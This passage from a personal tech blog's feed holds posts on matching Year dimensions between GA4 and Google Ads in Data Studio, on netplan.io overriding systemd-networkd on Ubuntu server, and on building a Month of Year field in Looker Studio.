<p>The takeaway: If we need a low granularity based upon years - Google does not provide us with two compatible Dimensions. The solution: build a new field using functions that will convert both <strong>Year</strong> dimensions into a compatible format. The format has to be exactly the same: the same value representation and same data type. This is best achieved if we create a new field in both source tables.</p>

<p>Let’s introduce a new dimension and call it <strong>Just year</strong>. The formula for Google Analytics 4 would be: <code class="language-plaintext highlighter-rouge">SUBSTR(Year, 1, 4)</code> and for Google Ads: <code class="language-plaintext highlighter-rouge">CAST(Year AS TEXT)</code>. This means both fields won’t be even treated as time-based values, only as a simple text. This isn’t a problem, they will only provide relationship between the two data sets. We can always use the real dimensions called <strong>Year</strong> to plot our Charts.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[Dimension names are deceptive. Just because they have the same name both in GA4 and Ads, it does not mean they follow the same convention of data formatting. To blend successfully, you have to make sure both Dimensions have the same data format. Watch out for source data granularity.]]></summary></entry><entry><title type="html">Why does Ubuntu server ignore systemd-networkd configuration</title><link href="https://marekrost.cz/why-does-ubuntu-server-ignore-systemd-networkd-configuration/" rel="alternate" type="text/html" title="Why does Ubuntu server ignore systemd-networkd configuration" /><published>2023-05-02T00:00:00+00:00</published><updated>2023-05-02T00:00:00+00:00</updated><id>https://marekrost.cz/why-does-ubuntu-server-ignore-systemd-networkd-configuration</id><content type="html" xml:base="https://marekrost.cz/why-does-ubuntu-server-ignore-systemd-networkd-configuration/"><![CDATA[<p>There is an additional service named <strong>netplan.io</strong> that overrides it. If you get rid of it, systemd-networkd will function correctly, just as described in the documentation.</p>

<p>I usually use Debian as the go-to OS for server machines, however, this time we were setting up several Dell servers that just wouldn’t talk with the Debian ISO images. Time was of the essence so we decided to grab the Ubuntu server 2022 LTS image instead.</p>

<p>We encountered trouble immediately when we tried to set up static networking. I checked if systemd-networkd was present - and to my surprise, it was already running. I checked the NIC names and configured a static network into <code class="language-plaintext highlighter-rouge">/etc/systemd/network/</code> accordingly.</p>

<p>This did not work. Obviously, something was interfering with systemd-networkd function. We reviewed running services with <code class="language-plaintext highlighter-rouge">systemctl status</code> and came up with nothing. The only remaining place that could be a reasonable source of such override was dbus. A review of <code class="language-plaintext highlighter-rouge">/usr/share/dbus-1/system-services/</code> revealed a suspicious file named <code class="language-plaintext highlighter-rouge">io.netplan.Netplan.service</code>. By finding the source package of this file with <code class="language-plaintext highlighter-rouge">dpkg -S</code> we were at the source at last.</p>

<p>It turned out that the standard systemd-networkd function was overriden by another package named <strong>netplan.io</strong>, which had its own fancy <a href="https://netplan.io/">website</a>. Since we did not know the syntax of <strong>netplan.io</strong>, it was easier to just completely remove it (along with several Ubuntu meta-packages that depended on it). Removal of netplan restored standard systemd-networkd function.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[There is an additional service named netplan.io that overrides it. If you get rid of it, systemd-networkd will function correctly, just as described in the documentation.]]></summary></entry><entry><title type="html">Google Data Studio and GA4 - Recreating the Month of Year dimension properly</title><link href="https://marekrost.cz/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly/" rel="alternate" type="text/html" title="Google Data Studio and GA4 - Recreating the Month of Year dimension properly" /><published>2022-05-13T00:00:00+00:00</published><updated>2022-05-13T00:00:00+00:00</updated><id>https://marekrost.cz/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly</id><content type="html" xml:base="https://marekrost.cz/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly/"><![CDATA[<p><strong>2023-09-08 UPDATE</strong>: It is no longer necessary to create custom <strong>Month of Year</strong> dimension. The new version of Google Data Studio (renamed to Looker Studio) now contains dimension called <strong>Year month</strong>. Additionally, my function is broken due to internal changes of <strong>Year</strong> dimension data formatting.</p>

<p><strong>Updated formula that works</strong> - Credit to <strong><a href="http://facine.es/">Manuel Garcia</a></strong>:</p>

<p><code class="language-plaintext highlighter-rouge">PARSE_DATE('%Y-%m', CONCAT(SUBSTR(Year, 1, 4), '-', IF(Month &lt; 10, CONCAT('0', Month), CAST(Month AS TEXT ) ) ) )</code></p>

<h2 id="original-article-text">Original article text</h2>

<p>To get <strong>Month of Year</strong> dimension it is not as simple as writing <code class="language-plaintext highlighter-rouge">TODATE(Date, '%Y-%m').</code></p>

<p>It is a bad idea to use the above formula. Why? Because there are cases where it will behave incorrectly and you might snap your keyboard trying to figure out why doesn’t your Google Data Studio dashboard show the same data as you can see in your Google Analytics account.</p>

<p>The problem comes from the source dimension used to build your <strong>Month of Year</strong> field. Since the source dimension is not based on <strong>Month</strong> but on a single day (<strong>Date</strong>), the data pulled from your Google Analytics will have different granularity.</p>

<p>This might not be a problem with metrics attached to a single event, however metrics over larger scopes that are less dependent on a single point in time will get distorted results.</p>

<p><img src="month-year-dim-ga4.png" alt="Comparison of Total users metric using correct vs incorrect Month of Year dimension in Google Data Studio" /></p>

<p>The above image demonstrates the difference on the metric <strong>Total users</strong>. The top chart uses correctly prepared <strong>Month of Year</strong> dimension  and shows visitors corresponding to the numbers in Google Analytics. The lower chart uses incorrect <strong>Month of Year</strong> dimension that uses <strong>Date</strong> as source dimension and the number of visitors appears higher.</p>

<p>So what is the reason for this difference? It is simple: The source dimensions you use to build custom fields in Data studio dictate how will the data get collected from Google Analytics database. When you use <strong>Date</strong> as a base for your <strong>Month of Year</strong> dimension, the <strong>Total users</strong> metric will be exported for each day independently and only afterwards merged together to add up to the months. This is obviously a problem - some visitors might have visited your website on multiple days, however their visits are now added up as if they come from different visitors.</p>

<p>So how to build <strong>Month of Year</strong> correctly? You must stick only to <strong>Year</strong> and <strong>Month</strong> dimensions. Merge them into a single field. The following formula is my crude implementation.</p>

<p><code class="language-plaintext highlighter-rouge">PARSE_DATE('%Y-%m', CONCAT(Year, '-', IF(Month &lt; 10, CONCAT('0', Month), CAST(Month AS TEXT ) ) ) )</code></p>

<p>The <strong>Year</strong> and <strong>Month</strong> dimensions are joined as a text and <strong>Month</strong> is zero padded when necessary (sadly there is no LPAD function in Data studio). Finally, the resulting text is converted back to Date format so Data studio can recognize this is a time-based field.</p>

<h2 id="article-changelog">Article changelog</h2>

<ul>
  <li>Updated bar chart image to corresponding time frames.</li>
  <li>Changed the correct dimension formula from compat. mode TODATE to PARSE_DATE.</li>
  <li>Update to Looker Studio renders this entire article obsolete.</li>
</ul>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[2023-09-08 UPDATE: It is no longer necessary to create custom Month of Year dimension. The new version of Google Data Studio (renamed to Looker Studio) now contains dimension called Year month. Additionally, my function is broken due to internal changes of Year dimension data formatting.]]></summary></entry></feed>